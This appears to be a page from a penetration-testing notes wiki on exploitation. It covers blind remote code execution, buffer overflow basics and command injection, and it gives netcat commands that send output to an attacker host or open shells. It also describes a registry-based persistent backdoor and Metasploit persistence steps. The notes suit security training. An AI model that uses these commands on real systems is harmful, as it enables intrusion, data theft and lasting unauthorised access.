search

πŸ’£Exploitation

🏠Local File Inclusion (LFI)chevron-right🐚Shellschevron-rightπŸ’‰SQL Injection (SQLi)chevron-rightβš”οΈCross Site Scripting (XSS)chevron-right

hashtag
Remote Code Execution (RCE)

Allows the attacker to execute some code into the web application

There are many ways to do this, the following are targeted at blind code execution:

  • curl http://<attacker_ip:port>/<cmd_to_try>

  • if we have spaces in our returned output, we can base64 encode the result and then decode it on our system.

On our system, we set up a Netcat listener - nc -lvp <port>

If RCE exists we will see the output of the command

hashtag
Buffer Overflow Attacks

A buffer overflow attack works by taking control of the execution flow of a piece of software. This means being able to force an application to behave differently to how it was designed can lead to:

  • An app or OS crash, causing DOS

  • Privilege Escalation

  • Remote Code Execution (RCE)

  • Security features bypass

hashtag
Buffers

A buffer is an area in the computer of RAM reserved for temporary data storage.

  • User input

  • Parts of a video file

  • Server banners

Buffers have a finite size, which means they can only hold a limited amount of data If a client-server app is designed to accept only 8-characters long username, the username buffer will be 8 bytes long.

Buffers are stored in a data structure in computer memory known as a stack To add data to the stack we can use the Last in First Out (LIFO) approach.

  • Push: add an element to the stack

  • Pop: removes the last inserted element

In Modern OS's they still use LIFO but an app can randomly access a positon on the stack to read-write data. To save space for later use, the app can reserve memory allocations on the stack to access them.

A raw overflow that overwrites memory will crash an app, while a well-engineered attack is able to execute code.

A deep understanding of Assembly code is recommended!

https://wiki.skullsecurity.org/index.php?title=Fundamentalsarrow-up-right

hashtag
Impacket

  • lookupsid.py anonymous@<IP>

hashtag
ARP spoofing

hashtag
Command Injection πŸ’‰

  • If you are to execute commands on a server, you are able to pipe the output of a command to Netcat.

  • Eg. ls -la | nc {VPN_IP} {PORT} .This will send the output of ls -la to your Netcat listener.

  • We can use Netcat with the following flag to execute commands on a server:

  • nc -lvp <PORT> -e /bin/bash

hashtag
Backdoors πŸšͺ

hashtag
Netcat

  • The victim has the listener so we can get a shell with:

    • ncat <victim_IP> <port>

  • The attacker has the listener:

    • ncat -lvp <port> -v

    • On the victim's machine, we connect to the attacker IP and we should have access to a shell!

  • Persistent backdoor

    • On the attacker machine we run:

      • ncat -l -p <port> -v

    • On the victim machine, we need to add Netcat (or Winconfig in this case) to the proper registry so it will start on boot.

      • On Windows, this in the Registry Editor

      • add the name winconfig and value "PATH TO winconfig.exe <attacker_ip> <port> -e cmd.exe"

hashtag
Metasploit

  • If we already have a Meterpreter session on the victim's machine

  • Find the module: s4u_persistence

  • set OPTIONS:

    • set SESSION {id}

    • set TRIGGER logon

    • set PAYLOAD to meterpreter reverse_tcp

    • set LHOST{local_host} and set LPORT{port}

    • run -j

    • then set up a listener using the handler exploit

    • then set the payload, LHOST and LPORT

    • exploit | run -j both commands will work

PreviousWeb HackingNextLocal File Inclusion (LFI)

Last updated